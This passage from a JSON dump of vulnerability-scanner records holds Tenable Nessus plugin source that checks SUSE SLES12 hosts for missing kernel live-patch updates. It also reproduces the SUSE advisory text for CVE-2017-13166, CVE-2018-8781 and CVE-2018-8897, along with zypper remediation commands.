script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_101-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_101-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:27", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_51 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1531-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110364", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1531-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1531-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110364);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1531-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_51 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181531-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8e8710b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1057=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1057=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_51-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_51-xen-9-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:18", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_69 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1509-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110344", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1509-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1509-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110344);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1509-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_69 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181509-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c1f1c622\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1049=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1049=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_69-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_69-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_69-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_69-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:27", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_82 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1528-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110361", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1528-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1528-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110361);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1528-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_82 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181528-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddec646b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1048=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1048=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_82-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_82-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_82-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_82-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:34", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1540-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110373", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1540-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1540-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110373);\n script_version(\"1.9\");\n 